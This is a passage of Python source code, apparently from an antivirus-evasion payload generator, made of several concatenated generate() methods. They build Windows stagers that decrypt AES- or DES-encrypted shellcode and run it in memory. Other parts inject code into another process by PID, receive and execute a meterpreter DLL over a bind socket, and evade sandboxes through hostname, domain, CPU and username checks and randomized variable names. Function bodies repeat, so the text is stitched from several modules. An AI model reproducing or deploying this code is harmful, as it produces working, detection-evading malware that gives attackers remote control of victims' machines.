2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
"HOSTNAME"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
"DOMAIN"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
"PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
"USERNAME"][
0] + '\'.lower() in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
# encrypt the shellcode and get our randomized key
encoded_ciphertext, constrained_key, encryption_key = encryption.constrained_aes(
Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.known_plaintext(
encryption_key, known_plaintext_string)
encrypted_plaintext_string = encrypted_plaintext_string.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload code
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import os\n'
payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \"" + constrained_key + '\" + str(' + key_guess + ')\n'
payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import os\n'
payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \'" + constrained_key + '\' + str(' + key_guess + ')\n'
payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
num_tabs_required = 0
payload_code = ''
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
"HOSTNAME"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
"DOMAIN"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
"PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
"USERNAME"][
0] + '\'.lower() in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
pid_num_variable = evasion_helpers.randomString()
pagerwx_variable = evasion_helpers.randomString()
processall_variable = evasion_helpers.randomString()
memcommit_variable = evasion_helpers.randomString()
shell_length_variable = evasion_helpers.randomString()
memalloc_variable = evasion_helpers.randomString()
prochandle_variable = evasion_helpers.randomString()
kernel32_variable = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from ctypes import *\n'
payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n'
payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n'
payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n'
payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options[
"PID_NUMBER"][0] + '\n'
payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
RandDESPayload = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# encrypt the shellcode and get our randomized key
encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption(
Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
# Generate Random Variable Names
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName, socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" % (getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" % (socketName)
payload_code += "\t\tglobal %s\n" % (clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (
socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" % (
socketName, self.required_options["RHOST"][0],
str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName,
socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (
fdBufName, clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % (
clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (
rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (
rcvCStringName, rcvStringName, rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" % (
rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (
rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" % (injectMethodName, tempShellcodeName)
payload_code += "\tif %s != None:\n" % (tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName,
tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (
fpName, shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % (
fpName, shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (
tempCBuffer, shellcodeBufName, shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % (
fpName, tempCBuffer, shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (
fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" % (shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
RandPtr = evasion_helpers.randomString()
RandHt = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
known_plaintext_string = evasion_helpers.randomString()
plaintext_string_variable = evasion_helpers.randomString()
key_guess = evasion_helpers.randomString()
secret_key = evasion_helpers.randomString()
small_constrained_key_variable = evasion_helpers.randomString()
decoded_ciphertext = evasion_helpers.randomString()
decoded_known = evasion_helpers.randomString()
decoded_shellcode = evasion_helpers.randomString()
RandCipherObject = evasion_helpers.randomString()
RandPadding = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# encrypt the shellcode and get our randomized key
encoded_ciphertext, constrained_key, encryption_key = encryption.constrained_aes(Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.known_plaintext(encryption_key, known_plaintext_string)
encrypted_plaintext_string = encrypted_plaintext_string.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload code
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import os\n'
payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \"" + constrained_key + '\" + str(' + key_guess + ')\n'
payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import os\n'
payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \'" + constrained_key + '\' + str(' + key_guess + ')\n'
payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code = ''
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
RandPtr = evasion_helpers.randomString()
RandHt = evasion_helpers.randomString()
RandDESPayload = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
